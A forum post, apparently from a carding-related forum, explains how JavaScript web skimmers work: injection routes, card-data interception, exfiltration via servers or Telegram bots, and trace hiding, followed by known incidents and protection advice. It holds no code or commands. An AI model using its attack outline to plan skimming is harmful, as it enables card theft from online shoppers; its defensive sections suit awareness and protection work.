How does a web skimmer work?

chushpan

chushpan

Professional
Messages
995
Reaction score
841
Points
93
A web skimmer (or JS skimmer) is a malicious script that is embedded on legitimate websites to steal users' bank card data. Unlike traditional skimming devices that are installed on ATMs or terminals, web skimmers operate over the Internet and target online payments. Let's look at how a web skimmer works, its main stages, and protection methods.

1. The main purpose of a web skimmer​

The purpose of the web skimmer is to intercept bank card data that users enter on infected websites:
  • Card number.
  • Validity period.
  • CVV/CVC code.
  • Cardholder's name.

This data is then sent to attackers for use in fraudulent operations (e.g. carding).

2. How does a web skimmer work?​

2.1. Malicious code injection​

Carders inject malicious JavaScript into the target website. This can be done in several ways:
  • Website compromise: Hacking the admin panel or CMS (e.g. WordPress).
  • Attacks on third-party providers: Script injection through vulnerabilities in third-party services (e.g. analytics, support chats).
  • Exploiting vulnerable plugins: Exploiting vulnerabilities in popular JavaScript plugins or libraries.
  • Phishing website owners: Deceiving administrators to gain access to the site.

2.2. Data interception​

Once implemented, the malicious script starts running when the user visits the infected site:
  • Data entry monitoring: The script monitors the input fields on the payment page.
  • Information interception: When the user enters card details, the script copies them.
  • Activity Hiding: The script disguises itself as a legitimate code and does not interfere with the payment process so that the victim does not notice anything suspicious.

2.3. Transferring data to an attacker​

The collected data is sent to the attacker's server via:
  • Hidden URLs: Data is transmitted to a remote server via HTTP/HTTPS.
  • API: Cloud services or specialized platforms are used.
  • Telegram Bots: Modern web skimmers often use Telegram to quickly transfer data.

2.4. Removing traces​

To avoid detection:
  • Attackers can temporarily disable the script.
  • Use encryption to hide transmitted data.
  • They disguise the code as legal website elements.

3. Where are web skimmers used?​

3.1. Online stores​

  • Web skimmers are often deployed on popular websites with high payment volumes:
    • Online retailers.
    • Ticket sales platforms.
    • Subscription services.

3.2. Banking websites​

  • Attackers can attack bank websites, especially those that offer online payment options.

3.3. Online payment methods​

  • Any form where users enter card details can become a target:
    • Donuts.
    • Payments for services.

4. Examples of known attacks using web skimmers​

4.1. Magecart​

  • A hacker group known for its attacks on online stores:
    • Injected malicious code into JavaScript libraries.
    • The targets were large companies such as British Airways and Ticketmaster.

4.2. Volusion​

  • In 2019, e-commerce platform Volusion was hacked and malicious code was injected into hundreds of customer sites.

4.3. WooCommerce и Shopify​

  • These popular platforms have also been targets of attacks through vulnerable plugins or themes.

5. How to protect yourself from web skimmers​

5.1 For Users​

  • Use secure payment methods:
    • Apple Pay, Google Pay or other tokenized systems.
    • Disposable virtual cards.
  • Check the website URL:
    • Make sure you are on the official website.
  • Update your browser:
    • Modern browsers have built-in mechanisms to protect against web skimmers.
  • Use antivirus software:
    • Some antiviruses can block malicious scripts.

5.2 For website owners​

  • Check the code regularly:
    • Look for suspicious scripts or changes in files.
  • Update CMS and plugins:
    • Vulnerabilities often arise due to outdated software.
  • Use Content Security Policy (CSP):
    • CSP helps restrict the execution of third-party scripts.
  • Monitor traffic:
    • Use tools to analyze outgoing traffic for suspicious requests.
  • Encrypt data:
    • Use HTTPS to protect user data.

6. What to do if your site has become a victim of a web skimmer​

6.1. Attack detection​

  • Check the site's source code for suspicious scripts.
  • Analyze outgoing traffic.

6.2. Removing Vulnerabilities​

  • Remove malicious code.
  • Update all website components (CMS, plugins, themes).

6.3. Notification to Users​

  • Notify users about a potential data leak.
  • Recommend that they check their accounts and block their cards.

6.4. Strengthening Security​

  • Implement additional security measures (e.g. CSP, two-factor authentication for administrators).

Conclusion​

Web skimmers pose a serious threat to users and website owners, as they allow attackers to steal bank card details directly during online payments. However, most attacks can be prevented by following security rules and regularly checking the site for vulnerabilities.

The main conclusion: Website owners should pay special attention to protecting their platforms, and users should use secure payment methods and be careful about the sites where they enter card details.
 
You must log in or register to reply here.

Similar threads

chushpan
How does a skimmer work and what does it contain
Replies
0
Views
54
chushpan
chushpan
chushpan
How does online carding work?
Replies
1
Views
67
Cloned Boy
Cloned Boy
chushpan
How do logs work in carding
Replies
1
Views
45
Cloned Boy
Cloned Boy
chushpan
How does card tokenization work?
Replies
2
Views
55
Cloned Boy
Cloned Boy
chushpan
How do cloned cards work
Replies
0
Views
70
chushpan
chushpan
Back
Top